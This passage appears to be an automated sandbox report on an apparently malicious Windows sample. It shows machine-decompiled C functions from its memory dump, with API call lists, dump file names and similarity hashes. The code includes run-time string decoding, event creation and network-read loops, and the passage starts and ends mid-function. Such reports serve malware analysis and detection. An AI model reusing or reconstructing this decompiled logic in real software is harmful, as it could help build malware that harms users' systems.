                                                                                                                                                                                                                                                                                    						E00FC2A03(_t106);
                                                                                                                                                                                                                                                                                    						_t104 = _a16;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00FC2A03(_a24);
                                                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t103 = _a8;
                                                                                                                                                                                                                                                                                    					E00FC7973(_t104, _a8,  &_v284);
                                                                                                                                                                                                                                                                                    					__imp__(_t108 + _t104 - 0x117,  *0xfca38c);
                                                                                                                                                                                                                                                                                    					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                                                                    					_t97 = 0x80000003;
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x00fc2172
                                                                                                                                                                                                                                                                                    0x00fc217c
                                                                                                                                                                                                                                                                                    0x00fc217c
                                                                                                                                                                                                                                                                                    0x00fc2174
                                                                                                                                                                                                                                                                                    0x00fc2174
                                                                                                                                                                                                                                                                                    0x00fc2174
                                                                                                                                                                                                                                                                                    0x00fc2174
                                                                                                                                                                                                                                                                                    0x00fc219e
                                                                                                                                                                                                                                                                                    0x00fc21a6
                                                                                                                                                                                                                                                                                    0x00fc21d4
                                                                                                                                                                                                                                                                                    0x00fc21d9
                                                                                                                                                                                                                                                                                    0x00fc21e2
                                                                                                                                                                                                                                                                                    0x00fc21e7
                                                                                                                                                                                                                                                                                    0x00fc21eb
                                                                                                                                                                                                                                                                                    0x00fc221d
                                                                                                                                                                                                                                                                                    0x00fc21ed
                                                                                                                                                                                                                                                                                    0x00fc21fa
                                                                                                                                                                                                                                                                                    0x00fc21fd
                                                                                                                                                                                                                                                                                    0x00fc220d
                                                                                                                                                                                                                                                                                    0x00fc2210
                                                                                                                                                                                                                                                                                    0x00fc2216
                                                                                                                                                                                                                                                                                    0x00fc2216
                                                                                                                                                                                                                                                                                    0x00fc21a8
                                                                                                                                                                                                                                                                                    0x00fc21b5
                                                                                                                                                                                                                                                                                    0x00fc21b8
                                                                                                                                                                                                                                                                                    0x00fc21ca
                                                                                                                                                                                                                                                                                    0x00fc21cd
                                                                                                                                                                                                                                                                                    0x00fc21cd
                                                                                                                                                                                                                                                                                    0x00fc2227
                                                                                                                                                                                                                                                                                    0x00fc2233
                                                                                                                                                                                                                                                                                    0x00fc2229
                                                                                                                                                                                                                                                                                    0x00fc222c
                                                                                                                                                                                                                                                                                    0x00fc222c
                                                                                                                                                                                                                                                                                    0x00fc2227
                                                                                                                                                                                                                                                                                    0x00fc219e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc2165
                                                                                                                                                                                                                                                                                    0x00fc210d
                                                                                                                                                                                                                                                                                    0x00fc2117
                                                                                                                                                                                                                                                                                    0x00fc2119
                                                                                                                                                                                                                                                                                    0x00fc211e
                                                                                                                                                                                                                                                                                    0x00fc2122
                                                                                                                                                                                                                                                                                    0x00fc2124
                                                                                                                                                                                                                                                                                    0x00fc212f
                                                                                                                                                                                                                                                                                    0x00fc2132
                                                                                                                                                                                                                                                                                    0x00fc2132
                                                                                                                                                                                                                                                                                    0x00fc2138
                                                                                                                                                                                                                                                                                    0x00fc213d
                                                                                                                                                                                                                                                                                    0x00fc213d
                                                                                                                                                                                                                                                                                    0x00fc2143
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc2143
                                                                                                                                                                                                                                                                                    0x00fc2048
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc206f
                                                                                                                                                                                                                                                                                    0x00fc206f
                                                                                                                                                                                                                                                                                    0x00fc207b
                                                                                                                                                                                                                                                                                    0x00fc208e
                                                                                                                                                                                                                                                                                    0x00fc2094
                                                                                                                                                                                                                                                                                    0x00fc209c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc209c

APIs
• StrChrA.SHLWAPI(00FC7319,0000005F,00000000,00000000,00000104), ref: 00FC2061
• lstrcpy.KERNEL32(?,?), ref: 00FC208E
  • Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
  • Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
  • Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C
  • Part of subcall function 00FC33B7: lstrlenW.KERNEL32(00FC7319,?,?,00FC2202,3D00FC90,80000002,00FC7319,00FC742D,74666F53,4D4C4B48,00FC742D,?,3D00FC90,80000002,00FC7319,?), ref: 00FC33D7
  • Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F
• lstrcpy.KERNEL32(?,00000000), ref: 00FC20B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
• String ID: \
• API String ID: 3924217599-2967466578
• Opcode ID: ee5cf38bb0f126ebc89373b95848ee42e10cf20cc4a1b4e52f47dfeba47bbb37
• Instruction ID: 9cb8ddb96f5b51868a62c9d29a507c398ea53cbded1dd4a118ea0dcf583dd5e2
• Opcode Fuzzy Hash: ee5cf38bb0f126ebc89373b95848ee42e10cf20cc4a1b4e52f47dfeba47bbb37
• Instruction Fuzzy Hash: 9751577250020FAFDF619FA0DE87FAA77B9EB48314F108459FA1593021D73AEA15BB11
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                                                                    			E00FC13B4(intOrPtr* __eax) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xfca2d0; // 0x292d5a8
					_t5 = _t102 + 0xfcb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xfc92d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xfca2d0; // 0x292d5a8
												_t28 = _t108 + 0xfcb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xfca2d0; // 0x292d5a8
														_t33 = _t78 + 0xfcb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
                                                                                                                                                                                                                                                                                    			}





































APIs
• SysAllocString.OLEAUT32(00FC92D0), ref: 00FC1404
• lstrcmpW.KERNEL32(00000000,0076006F), ref: 00FC14E6
• SysFreeString.OLEAUT32(00000000), ref: 00FC14FF
• SysFreeString.OLEAUT32(?), ref: 00FC152E
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
Similarity
• API ID: String$Free$Alloclstrcmp
• String ID:
• API String ID: 1885612795-0
• Opcode ID: 201479f8c2246f9d9368eafe9cd413da3c9adf38e5a071e5124cb0dae41584f3
• Instruction ID: 0b7158f0db7680b75283b3f95f607c4f1a1fcc82327f2bce2d98afbf90ce8ba0
• Opcode Fuzzy Hash: 201479f8c2246f9d9368eafe9cd413da3c9adf38e5a071e5124cb0dae41584f3
• Instruction Fuzzy Hash: 25516075D0050ADFCB00DFA8C989DAEF7B9FF89304B144988E916EB221D771AD01DBA0
Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                    			E00FC1E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				void _v156;
                                                                                                                                                                                                                                                                                    				void _v428;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    				unsigned int _t56;
                                                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				signed int* _t99;
                                                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t92 = _a12;
                                                                                                                                                                                                                                                                                    				_t101 = __eax;
                                                                                                                                                                                                                                                                                    				_t55 = E00FC5278(_a16, _t92);
                                                                                                                                                                                                                                                                                    				_t79 = _t55;
                                                                                                                                                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t55;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                                                                    				_t81 = 0;
                                                                                                                                                                                                                                                                                    				_t96 = 0x20;
                                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                                                                    					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                                                                    					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                                                                    					E00FC2399(_t79,  &_v428);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00FC3C32(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                                                                                                                                                                    					E00FC3C32(_t79,  &_v156, _a12, _t97);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                                                                                                                                                                    					_t66 = E00FC2399(_t101,  &E00FCA188);
                                                                                                                                                                                                                                                                                    					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                                                                    					_a8 = _t103;
                                                                                                                                                                                                                                                                                    					if(_t103 < 0) {
                                                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                                                    						E00FC2399(_a16, _a4);
                                                                                                                                                                                                                                                                                    						E00FC114C(_t79,  &_v428, _a4, _t97);
                                                                                                                                                                                                                                                                                    						memset( &_v428, 0, 0x10c);
                                                                                                                                                                                                                                                                                    						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push( *_t99);
                                                                                                                                                                                                                                                                                    							L00FC7F56();
                                                                                                                                                                                                                                                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                                                                    							asm("adc edx, esi");
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(_v8 + 1);
                                                                                                                                                                                                                                                                                    							_push(_t92);
                                                                                                                                                                                                                                                                                    							_push(_t74);
                                                                                                                                                                                                                                                                                    							L00FC7F50();
                                                                                                                                                                                                                                                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t74 =  *_t99;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                                                                                                                                                                    						_a12 = _t74;
                                                                                                                                                                                                                                                                                    						_t76 = E00FC5381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							_t92 =  &_v156;
                                                                                                                                                                                                                                                                                    							if(E00FC45B4(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_a12 = _a12 + 1;
                                                                                                                                                                                                                                                                                    							_t76 = E00FC5936(_t79,  &_v156, _t106, _t106);
                                                                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_a8 = _a8 - 1;
                                                                                                                                                                                                                                                                                    						_t66 = _a12;
                                                                                                                                                                                                                                                                                    						_t99 = _t99 - 4;
                                                                                                                                                                                                                                                                                    						 *(_a8 * 4 +  &E00FCA188) = _t66;
                                                                                                                                                                                                                                                                                    					} while (_a8 >= 0);
                                                                                                                                                                                                                                                                                    					_t97 = _v12;
                                                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(_t81 < _t96) {
                                                                                                                                                                                                                                                                                    					_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                                    					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00FC1F44
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00FC1F5A
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC2003
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC2019
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d1832cffd5877601c2e14044527e0a9c36ee5409d17e1070839a301a82049a9b
                                                                                                                                                                                                                                                                                    • Instruction ID: 6c2ba301f1289c8744ec862543dbfbc5a3319c7932743ff335e5ba152a81420d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1832cffd5877601c2e14044527e0a9c36ee5409d17e1070839a301a82049a9b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41419271A0021AAFDB10EF68CD42FDE77B5EF46720F00456DB809A7182DB74AE54EB81
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                                                                                                                                    			E00FC467C(void* __eax) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				char* _t40;
                                                                                                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                                                                    				char* _t53;
                                                                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t64 = __eax;
                                                                                                                                                                                                                                                                                    				_t40 =  &_v12;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
                                                                                                                                                                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    					_t41 = GetLastError();
                                                                                                                                                                                                                                                                                    					_v8 = _t41;
                                                                                                                                                                                                                                                                                    					if(_t41 != 0x2efe) {
                                                                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_push( &_v24);
                                                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				if( *0xfca148() != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t45 = E00FC5C4E(0x1000);
                                                                                                                                                                                                                                                                                    				_v20 = _t45;
                                                                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                                                                                                    					_t46 = _v24;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						_t48 = _v12;
                                                                                                                                                                                                                                                                                    						if(_t48 >= 0x1000) {
                                                                                                                                                                                                                                                                                    							_t48 = 0x1000;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                                                                                                                                                                                                                                                                    						if(_t48 == 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 = _v24;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                                                                                                                                                                                                                                                                    						_t17 =  &_v12;
                                                                                                                                                                                                                                                                                    						 *_t17 = _v12 - _v16;
                                                                                                                                                                                                                                                                                    						if( *_t17 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						if(WaitForSingleObject( *0xfca2c4, 0) != 0x102) {
                                                                                                                                                                                                                                                                                    							_v8 = 0x102;
                                                                                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                                                                                    							E00FC2A03(_v20);
                                                                                                                                                                                                                                                                                    							if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    								_v8 = E00FC6589(_v24, _t64);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

APIs
• GetLastError.KERNEL32 ref: 00FC479C
  • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
• GetLastError.KERNEL32 ref: 00FC4710
• WaitForSingleObject.KERNEL32(00000000), ref: 00FC4720
• GetLastError.KERNEL32 ref: 00FC4740

Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp

Similarity
• API ID: ErrorLast$AllocateHeapObjectSingleWait
• String ID:
• API String ID: 35602742-0
• Opcode ID: 146131b085c7729d8ed67c44d5d37a2ab9da70cef7543a8a85e6f30d476623a5
• Instruction ID: 28e489d42794819d85a554e5c8d04ffb88c45f408d57d45a478c5f12e648c98c
• Opcode Fuzzy Hash: 146131b085c7729d8ed67c44d5d37a2ab9da70cef7543a8a85e6f30d476623a5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64104B5D0020AEBDF109FA4CA9AEAEBBB9FF05344B24446DE501E7150D731AE40AB10
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
E00FC4CD5(signed int _a4, signed int* _a8) {
	void* __ecx;
	void* __edi;
	signed int _t6;
	intOrPtr _t8;
	intOrPtr _t12;
	void* _t25;
	void* _t26;
	signed int* _t27;
	signed short* _t28;
	CHAR* _t30;
	long _t31;
	intOrPtr* _t32;

	_t6 =  *0xfca2c8; // 0xbd092303
	_t32 = _a4;
	_a4 = _t6 ^ 0xd05b5869;
	_t8 =  *0xfca2d0; // 0x292d5a8
	_t3 = _t8 + 0xfcb84d; // 0x61636f4c
	_t25 = 0;
	_t30 = E00FC1970(_t3, 1);
	if(_t30 != 0) {
		_t25 = CreateEventA(0xfca2d4, 1, 0, _t30);
		E00FC2A03(_t30);
	}
	_t12 =  *0xfca2b4; // 0x2000000a
	if(_t12 != 6 || _t12 < 2) {
		if( *_t32 != 0 && E00FC19E7() == 0) {
			_t28 =  *0xfca124( *_t32, 0x20);
			if(_t28 != 0) {
				 *_t28 =  *_t28 & 0x00000000;
				_t28 =  &(_t28[1]);
			}
			_t31 = E00FC63CD(0, _t28,  *_t32, 0);
			if(_t31 == 0) {
				if(_t25 == 0) {
					goto L21;
				}
				_t31 = WaitForSingleObject(_t25, 0x4e20);
				if(_t31 == 0) {
					goto L19;
				}
			}
		}
		goto L11;
	} else {
		L11:
		_t27 = _a8;
		if(_t27 != 0) {
			 *_t27 =  *_t27 | 0x00000001;
		}
		_t31 = E00FC7836(_t32, _t26);
		if(_t31 == 0 && _t25 != 0) {
			_t31 = WaitForSingleObject(_t25, 0x4e20);
		}
		if(_t27 != 0 && _t31 != 0) {
			 *_t27 =  *_t27 & 0xfffffffe;
		}
		L19:
		if(_t25 != 0) {
			CloseHandle(_t25);
		}
		L21:
		return _t31;
	}
}
                                                                                                                                                                                                                                                                                    0x00fc4d94
                                                                                                                                                                                                                                                                                    0x00fc4da6
                                                                                                                                                                                                                                                                                    0x00fc4da6
                                                                                                                                                                                                                                                                                    0x00fc4daa
                                                                                                                                                                                                                                                                                    0x00fc4db0
                                                                                                                                                                                                                                                                                    0x00fc4db0
                                                                                                                                                                                                                                                                                    0x00fc4db3
                                                                                                                                                                                                                                                                                    0x00fc4db5
                                                                                                                                                                                                                                                                                    0x00fc4db8
                                                                                                                                                                                                                                                                                    0x00fc4db8
                                                                                                                                                                                                                                                                                    0x00fc4dbf
                                                                                                                                                                                                                                                                                    0x00fc4dc5
                                                                                                                                                                                                                                                                                    0x00fc4dc5

                                                                                                                                                                                                                                                                                    APIs
